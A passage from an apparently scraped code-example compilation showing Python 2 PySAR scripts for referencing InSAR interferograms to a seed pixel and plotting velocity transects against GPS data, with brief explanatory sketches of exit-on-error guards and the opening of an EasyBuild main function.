    numIfgrams = len(h5file['interferograms'].keys())
    if numIfgrams == 0.:
       print "There is no data in the file"
       sys.exit(1)
  
   # h5mask=h5py.File(maskFile,'r')
   # Mset=h5mask[h5mask.keys()[0]].get(h5mask.keys()[0])
   # M=Mset[0:Mset.shape[0],0:Mset.shape[1]]
    print 'Checking the reference pixel'
    if M[y][x]==0:
          print '*************************************************************************'    
          print 'ERROR:'
          print 'The selected reference pixel has NaN value in one or more interferograms!'
          print 'Choose another pixel as the reference pixel.'
          print '*************************************************************************'
          sys.exit(1)

    else:
          print 'Referencing all interferograms to the same pixel at:' + ' y= '+str(y)+' , x= '+str(x)+':'
          h5file_Seeded = h5py.File('Seeded_'+file,'w')
          Seeding(h5file,h5file_Seeded,y,x)
          print 'Done!'
          h5file_Seeded.close()          
          h5file.close()
         # h5mask.close()
          
################################
   
   except:

     # h5mask=h5py.File(maskFile,'r')
     # Mset=h5mask[h5mask.keys()[0]].get(h5mask.keys()[0])
     # M=Mset[0:Mset.shape[0],0:Mset.shape[1]]
      if method=='manual':
         print 'manual selection of the reference point'
         
         h5file = h5py.File(file)
         igramList = h5file['interferograms'].keys()
         stack = ut.stacking(h5file)
         stack[M==0]=np.nan

         fig = plt.figure()
         ax=fig.add_subplot(111)
         ax.imshow(stack)
         
         print 'Click on a pixel that you want to choose as the reference pixel in the time-series analysis and then close the displayed figure.'

         SeedingDone='no' 
         def onclick(event):
            if event.button==1:
               print 'click'
               x = int(event.xdata)
               y = int(event.ydata)
               if not np.isnan(stack[y][x]):
                  
                  print 'Referencing all interferograms to the same pixel at:' + ' y= '+str(y)+' , x= '+str(x)+':'
                  h5file_Seeded = h5py.File('Seeded_'+file)   
                  Seeding(h5file,h5file_Seeded,y,x)
                  print 'Done!'   
                  h5file_Seeded.close()
                  SeedingDone='yes'
                  plt.close() # this gives an error message "segmentation fault". Although it can be ignored, there should be a better way to close without an error message!
               else:
                  print ''
                  print 'warning:'
                  print 'The selected reference pixel has NaN value for some interferograms'
                  print 'Choose another pixel as the reference pixel'

              

         
         cid = fig.canvas.mpl_connect('button_press_event', onclick)
         plt.show()
         h5file.close()
         # h5mask.close()   # h5mask is never opened above (its creation is commented out)

         if SeedingDone=='no':
            print '''
          **********************************     
          WARNING: interferograms are not referenced to the same pixel yet!
          **********************************
         '''
      else:
         
         print 'Automatic selection of the reference pixel!'

        # Mset=h5file['mask'].get('mask')
        # M=Mset[0:Mset.shape[0],0:Mset.shape[1]]
         
         ind0=M==0
         if ind0.sum()==M.shape[0]*M.shape[1]:
            print 'Error:'
            print 'There is no pixel that has valid phase value in all interferograms.' 
            print 'Check the interferograms!'
            print 'Seeding failed'
            sys.exit(1)            

         try:
           Cset=h5file['meanCoherence'].get('meanCoherence')
           C=Cset[0:Cset.shape[0],0:Cset.shape[1]]
         
           C=C*M
           print 'finding a pixel with maximum average coherence'
           y,x=np.unravel_index(np.argmax(C), C.shape)

         except:
           y,x=random_selection(M)
             

         print 'Referencing all interferograms to the same pixel at:' + ' y= '+str(y)+' , x= '+str(x)+':'
         h5file_Seeded = h5py.File('Seeded_'+file,'w')
         Seeding(h5file,h5file_Seeded,y,x)
         print 'Done!'
         h5file_Seeded.close()
         h5file.close()
        # plt.imshow(C)
        # plt.plot(x,y,'^',ms=10)
        # plt.show()         
         
  elif 'timeseries' in k:
     print 'Seeding time-series'
     try:
        print 'Seeding time-series epochs to : y=' + str(y) + ' x='+str(x)
     except:
        print 'y and x coordinates of the Seed point are required!'
        sys.exit(1);
 
     h5file_Seeded = h5py.File('Seeded_'+file,'w')
     group=h5file_Seeded.create_group('timeseries')
     dateList=h5file['timeseries'].keys()
     for d in dateList:
        print d
        dset1=h5file['timeseries'].get(d)
        data=dset1[0:dset1.shape[0],0:dset1.shape[1]]
        dset = group.create_dataset(d, data=data-data[y,x], compression='gzip')
     
     for key,value in h5file['timeseries'].attrs.iteritems():
        group.attrs[key] = value
     group.attrs['ref_y']=y
     group.attrs['ref_x']=x

  elif 'velocity' in k:
     Vset=h5file['velocity'].get('velocity')
     V=Vset[0:Vset.shape[0],0:Vset.shape[1]]
     try:
     #   Vset=h5file[h5file.keys()[0]].get(h5file.keys()[0])
     #   V=Vset[0:Vset.shape[0],0:Vset.shape[1]]
        V=V-V[y,x]
        print y
        print x
        outFile= 'seeded_'+file
        h5file2 = h5py.File(outFile,'w')
        group=h5file2.create_group('velocity')
        dset = group.create_dataset('velocity', data=V, compression='gzip')
        for key, value in h5file[k[0]].attrs.iteritems():
            group.attrs[key] = value
        group.attrs['ref_y']=y
        group.attrs['ref_x']=x  
     except:
        print "Choose the reference point on the screen"
        fig = plt.figure()
        ax=fig.add_subplot(111)
        ax.imshow(V)

        print 'Click on a pixel that you want to choose as the reference pixel:'
        SeedingDone='no'
        def onclick(event):
            if event.button==1:
               print 'click'
               x = int(event.xdata)
               y = int(event.ydata)
               Vset=h5file[h5file.keys()[0]].get(h5file.keys()[0])
               V=Vset[0:Vset.shape[0],0:Vset.shape[1]]
               print V[1][1]
               if not np.isnan(V[y][x]):

                  print 'Referencing all interferograms to the same pixel at:' + ' y= '+str(y)+' , x= '+str(x)+':'

                  h5file2 = h5py.File('seeded_'+file,'w')
                  V=V-V[y][x]
                  group=h5file2.create_group('velocity')
                  dset = group.create_dataset('velocity', data=V, compression='gzip')
                  for key, value in h5file[k[0]].attrs.iteritems():
                      group.attrs[key] = value
                  group.attrs['ref_y']=y
                  group.attrs['ref_x']=x
                  print 'Done!'
                  h5file2.close()
                  SeedingDone='yes'
                  plt.close() # this gives a "segmentation fault" error message; it can be ignored, but there should be a better way to close without the error
               else:
                  print ''
                  print 'warning:'
                  print 'The selected reference pixel has a NaN value'
                  print 'Choose another pixel as the reference pixel'


        cid = fig.canvas.mpl_connect('button_press_event', onclick)
        plt.show()

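The seeding example above falls back to sys.exit(1) whenever its inputs cannot yield a reference pixel: when the mask has no pixel that is valid in every interferogram, and when no y/x seed coordinates are available for a time-series file. A minimal sketch of that guard pattern follows; check_reference_point and valid_mask are hypothetical names used for illustration, not part of PySAR:

import sys
import numpy as np

def check_reference_point(valid_mask, y=None, x=None):
    # valid_mask: boolean array, True where a pixel has a valid phase value
    # in every interferogram (hypothetical input, for illustration only)
    if not np.any(valid_mask):
        print('Error: no pixel has a valid phase value in all interferograms.')
        sys.exit(1)
    if y is None or x is None:
        print('y and x coordinates of the seed point are required!')
        sys.exit(1)
    return y, x
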
Example 49

Project: PySAR
Source File: transect.py
View license
def main(argv):
    ntrans=1
    save_to_mat='off'
    flip_profile='no'
    which_gps = 'all'
    flip_updown = 'yes'
    incidence_file='incidence_file'
    display_InSAR='on'
    display_Average='on'
    display_Standard_deviation='on'

    try:
       opts, args = getopt.getopt(argv,"f:s:e:n:d:g:l:h:r:L:F:p:u:G:S:i:I:A:U:E:")

    except getopt.GetoptError:
       Usage() ; sys.exit(1)

    for opt,arg in opts:
      if opt == '-f':
        velocityFile = arg
      elif opt == '-s':
        pnt1 = arg.split(',')
        y0=int(pnt1[0])
        x0=int(pnt1[1])
      elif opt == '-e':
        pnt2 = arg.split(',')
        y1=int(pnt2[0])
        x1=int(pnt2[1])
      elif opt == '-n':
        ntrans = int(arg)
      elif opt == '-d':
        dp = float(arg)
      elif opt == '-g':
        gpsFile=arg
      elif opt == '-r':
        refStation=arg
      elif opt == '-i':
        incidence_file=arg
      elif opt == '-L':
        stationsList = arg.split(',')
      elif opt == '-F':
        FaultCoords=arg.split(',')
      elif opt == '-p':
        flip_profile=arg
      elif opt == '-u':
        flip_updown=arg
        print flip_updown
      elif opt == '-G':
        which_gps=arg
      elif opt == '-S':
        gps_source=arg
      elif opt == '-l':
        lbound=float(arg)
      elif opt == '-I':
        display_InSAR=arg
      elif opt == '-A':
        display_Average=arg
      elif opt == '-U':
        display_Standard_deviation=arg
      elif opt == '-E':
        save_to_mat=arg
      elif opt == '-h':
        hbound=float(arg) 
    

    try:    
       h5file=h5py.File(velocityFile,'r')
    except:
       Usage()
       sys.exit(1)
    
    k=h5file.keys()
    dset= h5file[k[0]].get(k[0])
    z=dset[0:dset.shape[0],0:dset.shape[1]]

#############################################################################
 #   try:
 #     x0;y0;x1;y1
 #   except:
 #     fig = plt.figure()
 #     ax=fig.add_subplot(111)
 #     ax.imshow(z)
      

#      xc=[]
#      yc=[]
#      print 'please click on start and end point of the desired profile'
#      def onclick(event):
#        if event.button==1:
#          print 'click'
#          xc.append(int(event.xdata))
#          yc.append(int(event.ydata))
#      cid = fig.canvas.mpl_connect('button_press_event', onclick)
#      plt.show()    
#      x0=xc[0];x1=xc[1]
#      y0=yc[0];y1=yc[1]
##############################################################################
    try:
      lat,lon,lat_step,lon_step,lat_all,lon_all = get_lat_lon(h5file)
    except:
      print 'radar coordinate'
    
    try:
      Lat0 = dms2d(FaultCoords[0]); Lon0 = dms2d(FaultCoords[1])
      Lat1 = dms2d(FaultCoords[2]); Lon1 = dms2d(FaultCoords[3])
      Length,Width=np.shape(z)
      Yf0,Xf0=find_row_column(Lon0,Lat0,lon,lat,lon_step,lat_step)
      Yf1,Xf1=find_row_column(Lon1,Lat1,lon,lat,lon_step,lat_step)

      print '*********************************************'
      print ' Fault Coordinates:'
      print '   --------------------------  '
      print '    Lat          Lon'
      print str(Lat0) + ' , ' +str(Lon0)
      print str(Lat1) + ' , ' +str(Lon1)
      print '   --------------------------  '
      print '    row          column'
      print str(Yf0) + ' , ' +str(Xf0)
      print str(Yf1) + ' , ' +str(Xf1)
      print '*********************************************'
#      mf=float(Yf1-Yf0)/float((Xf1-Xf0))  # slope of the fault line
#      cf=float(Yf0-mf*Xf0)   # intercept of the fault line
#      df0=dist_point_from_line(mf,cf,x0,y0,1,1)   #distance of the profile start point from the Fault line
#      df1=dist_point_from_line(mf,cf,x1,y1,1,1)  #distance of the profile end point from the Fault line

#      mp=-1./mf  # slope of the profile, which is perpendicular to the fault line
#      x1=int((df0+df1)/np.sqrt(1+mp**2)+x0)    # correcting the end point of the profile to be on a line perpendicular to the Fault
#      y1=int(mp*(x1-x0)+y0)


    except:
      print '*********************************************'
      print 'No information about the Fault coordinates!'
      print '*********************************************'

#############################################################################
    try:
      x0;y0;x1;y1
    except:
      fig = plt.figure()
      ax=fig.add_subplot(111)
      ax.imshow(z)
      try:
        ax.plot([Xf0,Xf1],[Yf0,Yf1],'k-')
      except:
        print 'Fault line is not specified'

      xc=[]
      yc=[]
      print 'please click on start and end point of the desired profile'
      def onclick(event):
        if event.button==1:
          print 'click'
          xc.append(int(event.xdata))
          yc.append(int(event.ydata))
      cid = fig.canvas.mpl_connect('button_press_event', onclick)
      plt.show()
      x0=xc[0];x1=xc[1]
      y0=yc[0];y1=yc[1]
##############################################################################
    try:
      mf=float(Yf1-Yf0)/float((Xf1-Xf0))  # slope of the fault line
      cf=float(Yf0-mf*Xf0)   # intercept of the fault line
      df0=dist_point_from_line(mf,cf,x0,y0,1,1)   #distance of the profile start point from the Fault line
      df1=dist_point_from_line(mf,cf,x1,y1,1,1)  #distance of the profile end point from the Fault line

      mp=-1./mf  # slope of the profile, which is perpendicular to the fault line
      x1=int((df0+df1)/np.sqrt(1+mp**2)+x0)    # correcting the end point of the profile to be on a line perpendicular to the Fault
      y1=int(mp*(x1-x0)+y0)
    except:
      Info_aboutFault='No'

##############################################################################
    print '******************************************************'
    print 'First profile coordinates:'
    print 'Start point:  y = '+str(y0) +',x = '+ str(x0) 
    print 'End point:   y = '+ str(y1) + '  , x = '+str(x1)   
    print '' 
    print str(y0) +','+ str(x0)
    print str(y1) +','+ str(x1)
    print '******************************************************'
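    # sample the raster along the straight line between the two profile end points (integer-cast pixel indexing)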
    length = int(np.hypot(x1-x0, y1-y0))
    x, y = np.linspace(x0, x1, length), np.linspace(y0, y1, length)
    zi = z[y.astype(np.int), x.astype(np.int)]
    try:
      lat_transect=lat_all[y.astype(np.int), x.astype(np.int)]
      lon_transect=lon_all[y.astype(np.int), x.astype(np.int)] 
    except:
      lat_transect='Nan'
      lon_transect='Nan'
  #  print '$$$$$$$$$$$$$$$'
  #  print lat_transect
  #  print lat_all.shape
  #  print '$$$$$$$$$$$$$$$'

   # zi=get_transect(z,x0,y0,x1,y1)
 
    try:
       dx=float(h5file[k[0]].attrs['X_STEP'])*6375000.0*np.pi/180.0
       dy=float(h5file[k[0]].attrs['Y_STEP'])*6375000.0*np.pi/180.0
       DX=(x-x0)*dx
       DY=(y-y0)*dy
       D=np.hypot(DX, DY)
       print 'geo coordinate:'
       print 'profile length = ' +str(D[-1]/1000.0) + ' km'
     #  df0_km=dist_point_from_line(mf,cf,x0,y0,dx,dy)
    except:
       dx=float(h5file[k[0]].attrs['RANGE_PIXEL_SIZE'])
       dy=float(h5file[k[0]].attrs['AZIMUTH_PIXEL_SIZE'])
       DX=(x-x0)*dx
       DY=(y-y0)*dy
       D=np.hypot(DX, DY)
       print 'radar coordinate:'
       print 'profile length = ' +str(D[-1]/1000.0) + ' km'       
    #   df0_km=dist_point_from_line(mf,cf,x0,y0,dx,dy)

    try:
       df0_km=dist_point_from_line(mf,cf,x0,y0,dx,dy)
    except:
       print 'Fault line is not specified'


    transect=np.zeros([len(D),ntrans])    
    transect[:,0]=zi
    XX0=[];XX1=[]
    YY0=[];YY1=[]
    XX0.append(x0);XX1.append(x1)
    YY0.append(y0);YY1.append(y1)

    if ntrans >1:
      
       m=float(y1-y0)/float((x1-x0))
       c=float(y0-m*x0)       
       m1=-1.0/m
       try:
         dp
       except:
         dp=1.0
       if lat_transect=='Nan':
         for i in range(1,ntrans):
         
           X0=i*dp/np.sqrt(1+m1**2)+x0  
           Y0=m1*(X0-x0)+y0
           X1=i*dp/np.sqrt(1+m1**2)+x1
           Y1=m1*(X1-x1)+y1
           zi=get_transect(z,X0,Y0,X1,Y1)         
           transect[:,i]=zi
           XX0.append(X0);XX1.append(X1);
           YY0.append(Y0);YY1.append(Y1);
       else:
         transect_lat=np.zeros([len(D),ntrans])
         transect_lat[:,0]=lat_transect
         transect_lon=np.zeros([len(D),ntrans])
         transect_lon[:,0]=lon_transect
 
         for i in range(1,ntrans):
         
           X0=i*dp/np.sqrt(1+m1**2)+x0
           Y0=m1*(X0-x0)+y0
           X1=i*dp/np.sqrt(1+m1**2)+x1
           Y1=m1*(X1-x1)+y1
           zi=get_transect(z,X0,Y0,X1,Y1)
           lat_transect=get_transect(lat_all,X0,Y0,X1,Y1)
           lon_transect=get_transect(lon_all,X0,Y0,X1,Y1)       
           transect[:,i]=zi
           transect_lat[:,i]=lat_transect
           transect_lon[:,i]=lon_transect
           XX0.append(X0);XX1.append(X1);
           YY0.append(Y0);YY1.append(Y1);
       
   # print np.shape(XX0)
   # print np.shape(XX1)
   # print np.shape(YY0) 
   # print np.shape(YY1)


#############################################
    try:
        m_prof_edge,c_prof_edge=line(XX0[0],YY0[0],XX0[-1],YY0[-1])    
    except:
        print 'Plotting one profile'    
###############################################################################    
    if flip_profile=='yes':
       transect=np.flipud(transect)
       try:
         df0_km=np.max(D)-df0_km
       except:
         print ''
    

    print '******************************************************'
    try:
       gpsFile
    except:
       gpsFile='Nogps'
    print 'GPS velocity file:'
    print gpsFile
    print '*******************************************************'
    if os.path.isfile(gpsFile):
       insarData=z
       del z
       fileName, fileExtension = os.path.splitext(gpsFile)
    #   print fileExtension
     #  if fileExtension =='.cmm4':
     #      print 'reading cmm4 velocities'
     #      Stations, gpsData = redGPSfile_cmm4(gpsFile)
     #      idxRef=Stations.index(refStation)
     #      Lon,Lat,Ve,Vn,Se,Sn,Corr,Hrate,H12=gpsData[idxRef,:]
     #      Lon=Lon-360.0
          # Lat,Lon,Ve,Se,Vn,Sn,Corr,NumEpochs,timeSpan,AvgEpochTimes = gpsData[idxRef,:]
     #      Vu=0
     #  else:
     #      Stations, gpsData = redGPSfile(gpsFile)
     #      idxRef=Stations.index(refStation)
     #      Lat,Lon,Vn,Ve,Sn,Se,Corr,Vu,Su = gpsData[idxRef,:]
      
       Stations,Lat,Lon,Ve,Se,Vn,Sn=readGPSfile(gpsFile,gps_source)
       idxRef=Stations.index(refStation)
       Length,Width=np.shape(insarData)
      # lat,lon,lat_step,lon_step = get_lat_lon(h5file,Length,Width)
       lat,lon,lat_step,lon_step,lat_all,lon_all=get_lat_lon(h5file)
       IDYref,IDXref=find_row_column(Lon[idxRef],Lat[idxRef],lon,lat,lon_step,lat_step)
       if (not np.isnan(IDYref)) and (not np.isnan(IDXref)):
         print 'referencing InSAR data to the GPS station at : ' + str(IDYref) + ' , '+ str(IDXref)
         if not np.isnan(insarData[IDYref][IDXref]):
             transect = transect - insarData[IDYref][IDXref]
             insarData=insarData - insarData[IDYref][IDXref]
            
         else:
            
             print ''' 
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
      
      WARNING: NaN value for InSAR data at the reference pixel!
               The reference station should be a pixel with a valid value in the InSAR data.
                               
               Please select another GPS station as the reference station.

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                       
                   '''
             sys.exit(1)
       else:
         print 'WARNING:'
         print 'Reference GPS station is out of the area covered by InSAR data'
         print 'please select another GPS station as the reference station.'
         sys.exit(1)
       
       try:
         stationsList
       except:
         stationsList = Stations

        
      # theta=23.0*np.pi/180.0
       if os.path.isfile(incidence_file):
           print 'Using exact look angle for each pixel'
           h5file_theta=h5py.File(incidence_file,'r')
           dset=h5file_theta['mask'].get('mask')
           theta=dset[0:dset.shape[0],0:dset.shape[1]]
           theta=theta*np.pi/180.0
       else:
           print 'Using average look angle'
           theta=np.ones(np.shape(insarData))*23.0*np.pi/180.0

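       # heading angle hard-coded at 193 degrees, converted to radians (assumed constant for the whole scene)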
       heading=193.0*np.pi/180.0
       
     #  unitVec=[-np.sin(theta)*np.sin(heading),-np.cos(heading)*np.sin(theta),-np.cos(theta)]
       unitVec=[np.cos(heading)*np.sin(theta),-np.sin(theta)*np.sin(heading),0]#-np.cos(theta)]
       
      #  [0.0806152480932643, 0.34918300221540616, -0.93358042649720174]
       # print unitVec 
       # unitVec=[0.3,-0.09,0.9]
      # unitVec=[-0.3,0.09,-0.9]
      # unitVec=[-0.3,0.09,0]

      # print '*******************************************'
      # print 'unit vector to project GPS to InSAR LOS:'
      # print unitVec
      # print '*******************************************'
      # gpsLOS_ref=unitVec[0]*Ve[idxRef]+unitVec[1]*Vn[idxRef]#+unitVec[2]*Vu[idxRef]       

#       print np.shape(theta)
#       print IDYref
#       print IDXref
#       print theta[IDYref,IDXref]

       gpsLOS_ref = gps_to_LOS(Ve[idxRef],Vn[idxRef],theta[IDYref,IDXref],heading)
       print '%%%%%%^^^^^^^%%%%%%%%'
       print gpsLOS_ref/1000.0
      # insarData=insarData -gpsLOS_ref/1000.0 
      # transect = transect -gpsLOS_ref/1000.0

       GPS=[]
       GPS_station=[]
       GPSx=[]
       GPSy=[]
       GPS_lat=[]
       GPS_lon=[]
       for st in stationsList:
         try :
           idx=Stations.index(st)
          
          # gpsLOS = unitVec[0]*Ve[idx]+unitVec[1]*Vn[idx]#+unitVec[2]*Vu[idx]
            
         #  gpsLOS = gps_to_LOS(Ve[idx],Vn[idx],theta[idx],heading)
         #  gpsLOS=gpsLOS-gpsLOS_ref

           IDY,IDX=find_row_column(Lon[idx],Lat[idx],lon,lat,lon_step,lat_step)
           print theta[IDY,IDX]
           gpsLOS = gps_to_LOS(Ve[idx],Vn[idx],theta[IDY,IDX],heading)
         #  gpsLOS = gpsLOS-gpsLOS_ref

           if which_gps =='all':
             if theta[IDY,IDX]!=0.0:
               GPS.append(gpsLOS-gpsLOS_ref)
               GPS_station.append(st)
               GPSx.append(IDX)
               GPSy.append(IDY)
               GPS_lat.append(Lat[idx])
               GPS_lon.append(Lon[idx])   
           elif not np.isnan(insarData[IDY][IDX]):
             if theta[IDY,IDX]!=0.0:
               GPS.append(gpsLOS-gpsLOS_ref)
               GPS_station.append(st)
               GPSx.append(IDX)
               GPSy.append(IDY)
               GPS_lat.append(Lat[idx])
               GPS_lon.append(Lon[idx])
         except:
           NoInSAR='yes'   
       
      # print GPS_station
      # print gpsLOS 
       DistGPS=[]
       GPS_in_bound=[]
       GPS_in_bound_st=[] 
       GPSxx=[]
       GPSyy=[]
       for i in range(len(GPS_station)):
         gx=GPSx[i]
         gy=GPSy[i]
 #        print '******************'
      #   print gx
      #   print gy
         if which_gps in ['all','insar']:
             check_result = 'True'
         else:
             check_result=check_st_in_box(gx,gy,x0,y0,x1,y1,X0,Y0,X1,Y1)

         if check_result=='True':
           check_result2=check_st_in_box2(gx,gy,x0,y0,x1,y1,X0,Y0,X1,Y1)
           GPS_in_bound_st.append(GPS_station[i])
           GPS_in_bound.append(GPS[i])
           GPSxx.append(GPSx[i])
           GPSyy.append(GPSy[i])   
          # gy=y0+1
          # gx=x0+1
          # gxp,gyp=get_intersect(m,c,gx,gy)
          # Dx=dx*(gx-gxp);Dy=dy*(gy-gyp)
          # print gxp
          # print gyp
           dg = dist_point_from_line(m,c,gx,gy,1,1) # distance of GPS station from the first profile line
          # DistGPS.append(np.hypot(Dx,Dy))
          # X0=dg/np.sqrt(1+m1**2)+x0
          # Y0=m1*(X0-x0)+y0
          # DistGPS.append(np.hypot(dx*(gx-X0), dy*(gy-Y0)))
          
           DistGPS.append(dist_point_from_line(m_prof_edge,c_prof_edge,GPSx[i],GPSy[i],dx,dy))
           

       print '****************************************************'
       print 'GPS stations in the profile area:' 
       print GPS_in_bound_st
       print '****************************************************'
       GPS_in_bound = np.array(GPS_in_bound)
       DistGPS = np.array(DistGPS)
   #    axes[1].plot(DistGPS/1000.0, -1*GPS_in_bound/1000, 'bo')

    if gpsFile=='Nogps':

        insarData=z
        GPSxx=[]
        GPSyy=[]
        GPSx=[];GPSy=[]
        GPS=[]
        XX0[0]=x0;XX1[0]=x1;YY0[0]=y0;YY1[0]=y1

   # else:

    print '****************'
    print 'flip up-down'
    print flip_updown

    if flip_updown=='yes' and gpsFile!='Nogps':
       print 'Flipping up-down'
       transect=-1*transect
       GPS_in_bound=-1*GPS_in_bound
    elif flip_updown=='yes':
       print 'Flipping up-down'
       transect=-1*transect


    if flip_profile=='yes' and gpsFile!='Nogps':
       
       GPS=np.flipud(GPS)
       GPS_in_bound=np.flipud(GPS_in_bound)
       DistGPS=np.flipud(max(D)-DistGPS)


    fig, axes = plt.subplots(nrows=2)
    axes[0].imshow(insarData)
    for i in range(ntrans):
        axes[0].plot([XX0[i], XX1[i]], [YY0[i], YY1[i]], 'r-')

    axes[0].plot(GPSx,GPSy,'b^')
    axes[0].plot(GPSxx,GPSyy,'k^')
    if gpsFile!='Nogps':
        axes[0].plot(IDXref,IDYref,'r^')       
    axes[0].axis('image')
    axes[1].plot(D/1000.0,transect,'ko',ms=1)

    avgInSAR=np.array(nanmean(transect,axis=1))
    stdInSAR=np.array(nanstd(transect,axis=1))
  #  print avgInSAR
  #  print stdInSAR
    
      #std=np.std(transect,1)
   # axes[1].plot(D/1000.0, avgInSAR, 'r-')
    try:
      axes[1].plot(DistGPS/1000.0, -1*GPS_in_bound/1000, 'b^',ms=10)
    except:
      print ''
   # pl.fill_between(x, y-error, y+error,alpha=0.6, facecolor='0.20')
   # print transect
#############################################################################

    fig2, axes2 = plt.subplots(nrows=1)
    axes2.imshow(insarData)
    #for i in range(ntrans):
    axes2.plot([XX0[0], XX1[0]], [YY0[0], YY1[0]], 'k-')
    axes2.plot([XX0[-1], XX1[-1]], [YY0[-1], YY1[-1]], 'k-')
    axes2.plot([XX0[0], XX0[-1]], [YY0[0], YY0[-1]], 'k-')
    axes2.plot([XX1[0], XX1[-1]], [YY1[0], YY1[-1]], 'k-')

    try:
       axes2.plot([Xf0,Xf1],[Yf0,Yf1], 'k-')
    except:
       FaultLine='None'
    

    axes2.plot(GPSx,GPSy,'b^')
    axes2.plot(GPSxx,GPSyy,'k^')
    if gpsFile!='Nogps':
        axes2.plot(IDXref,IDYref,'r^')
    axes2.axis('image')

    figName = 'transect_area.png'
    print 'writing '+figName
    plt.savefig(figName)    

#############################################################################
    fig = plt.figure()
    fig.set_size_inches(10,4)
    ax = plt.Axes(fig, [0., 0., 1., 1.], )
    ax=fig.add_subplot(111)
    if display_InSAR in ['on','On','ON']:
       ax.plot(D/1000.0,transect*1000,'o',ms=1,mfc='Black', linewidth='0')


############################################################################
# save the profile data:     
    if save_to_mat in ['ON','on','On','yes','y','YES','Yes']:
       import scipy.io as sio
       matFile='transect.mat'
       dataset={}
       dataset['datavec']=transect
       try:
         dataset['lat']=transect_lat
         dataset['lon']=transect_lon
       except:
         dataset['lat']='Nan'
         dataset['lon']='Nan'
       dataset['Unit']='m'
       dataset['Distance_along_profile']=D
       print '*****************************************'
       print ''
       print 'writing transect to >>> '+matFile
       sio.savemat(matFile, {'dataset': dataset})
       print ''
       print '*****************************************'
############################################################################
 #   ax.plot(D/1000.0, avgInSAR*1000, 'r-')
 
#    ax.plot(D/1000.0,transect*1000/(np.sin(23.*np.pi/180.)*np.cos(38.*np.pi/180.0)),'o',ms=1,mfc='Black', linewidth='0')
#    ax.plot(D/1000.0, avgInSAR*1000/(np.sin(23.*np.pi/180.)*np.cos(38.*np.pi/180.0)), 'r-')

#############################################################################
    if display_Standard_deviation in ['on','On','ON']:
 
       for i in np.arange(0.0,1.01,0.01):
          ax.plot(D/1000.0, (avgInSAR-i*stdInSAR)*1000, '-',color='#DCDCDC',alpha=0.5)#,color='#DCDCDC')#'LightGrey')
       for i in np.arange(0.0,1.01,0.01):
          ax.plot(D/1000.0, (avgInSAR+i*stdInSAR)*1000, '-',color='#DCDCDC',alpha=0.5)#'LightGrey')
#############################################################################
    if display_Average in ['on','On','ON']:
       ax.plot(D/1000.0, avgInSAR*1000, 'r-')
########### 
  # ax.fill_between(D/1000.0, (avgInSAR-stdInSAR)*1000, (avgInSAR+stdInSAR)*1000,where=(avgInSAR+stdInSAR)*1000>=(avgInSAR-stdInSAR)*1000,alpha=1, facecolor='Red')

    try:      
        ax.plot(DistGPS/1000.0, -1*GPS_in_bound, '^',ms=10,mfc='Cyan')
    except:
        print ''
    ax.set_ylabel('LOS velocity [mm/yr]',fontsize=26)
    ax.set_xlabel('Distance along profile [km]',fontsize=26)


   # print '******************'
   # print 'Distance of fault from the beginning of profile (km):'
   # print df0_km/1000.0


    ###################################################################
    # lower and upper bounds for displaying the profile

    try:
       lbound
       hbound
    except:
       lbound=np.nanmin(transect)*1000
       hbound=np.nanmax(transect)*1000


    ###################################################################
    #To plot the Fault location on the profile
    try:
       ax.plot([df0_km/1000.0,df0_km/1000.0], [lbound,hbound], '--',color='black',linewidth='2')
    except:
       fault_loc='None'

    ###################################################################
    

    try: 
         ax.set_ylim(lbound,hbound)
    except:
         ylim='no'

   # try: 
   #      ax.set_xlim(-10,300)
   # except:
    #     xlim='no'


##########
#Temporary To plot DEM
   # try:
#    majorLocator = MultipleLocator(5)
#    ax.yaxis.set_major_locator(majorLocator)
#    minorLocator   = MultipleLocator(1)
#    ax.yaxis.set_minor_locator(minorLocator)

#    plt.tick_params(which='major', length=15,width=2)
#    plt.tick_params(which='minor', length=6,width=2)

#    try:
#       for tick in ax.xaxis.get_major_ticks():
#                tick.label.set_fontsize(26)
#       for tick in ax.yaxis.get_major_ticks():
#                tick.label.set_fontsize(26)
#    
#       plt.tick_params(which='major', length=15,width=2)
#       plt.tick_params(which='minor', length=6,width=2)
#    except:
#       print 'could not fix the ticks!'


    figName = 'transect.png'
    print 'writing '+figName
    plt.savefig(figName)
    print ''
    print '________________________________'
#############################################################################
    plt.show()

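In transect.py above, unusable command-line input is handled the same way throughout: a getopt.GetoptError or a velocity file that cannot be opened leads to Usage() followed by sys.exit(1). The sketch below isolates that pattern; the single -f option, usage() and parse_args() are illustrative stand-ins, not PySAR's actual interface:

import getopt
import sys

def usage():
    print('usage: transect_sketch.py -f <velocity_file>')

def parse_args(argv):
    # minimal version of the option handling used in transect.py above
    try:
        opts, args = getopt.getopt(argv, "f:")
    except getopt.GetoptError:
        usage()
        sys.exit(1)   # unrecognised flags: show help, return a non-zero status to the shell
    velocity_file = None
    for opt, arg in opts:
        if opt == '-f':
            velocity_file = arg
    if velocity_file is None:
        usage()
        sys.exit(1)   # required -f argument is missing
    return velocity_file

if __name__ == '__main__':
    print(parse_args(sys.argv[1:]))
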
Example 50

Project: easybuild-framework
Source File: main.py
View license
def main(args=None, logfile=None, do_build=None, testing=False, modtool=None):
    """
    Main function: parse command line options, and act accordingly.
    :param args: command line arguments to use
    :param logfile: log file to use
    :param do_build: whether or not to actually perform the build
    :param testing: enable testing mode
    """
    # purposely capture session state very early, to avoid modules loaded by EasyBuild meddling in
    init_session_state = session_state()

    # initialise options
    eb_go = eboptions.parse_options(args=args)
    options = eb_go.options
    orig_paths = eb_go.args

    # set umask (as early as possible)
    if options.umask is not None:
        new_umask = int(options.umask, 8)
        old_umask = os.umask(new_umask)

    # set by option parsers via set_tmpdir
    eb_tmpdir = tempfile.gettempdir()

    # initialise logging for main
    global _log
    _log, logfile = init_logging(logfile, logtostdout=options.logtostdout,
                                 silent=(testing or options.terse), colorize=options.color)

    # disallow running EasyBuild as root
    if os.getuid() == 0:
        raise EasyBuildError("You seem to be running EasyBuild with root privileges which is not wise, "
                             "so let's end this here.")

    # log startup info
    eb_cmd_line = eb_go.generate_cmd_line() + eb_go.args
    log_start(eb_cmd_line, eb_tmpdir)

    if options.umask is not None:
        _log.info("umask set to '%s' (used to be '%s')" % (oct(new_umask), oct(old_umask)))

    # process software build specifications (if any), i.e.
    # software name/version, toolchain name/version, extra patches, ...
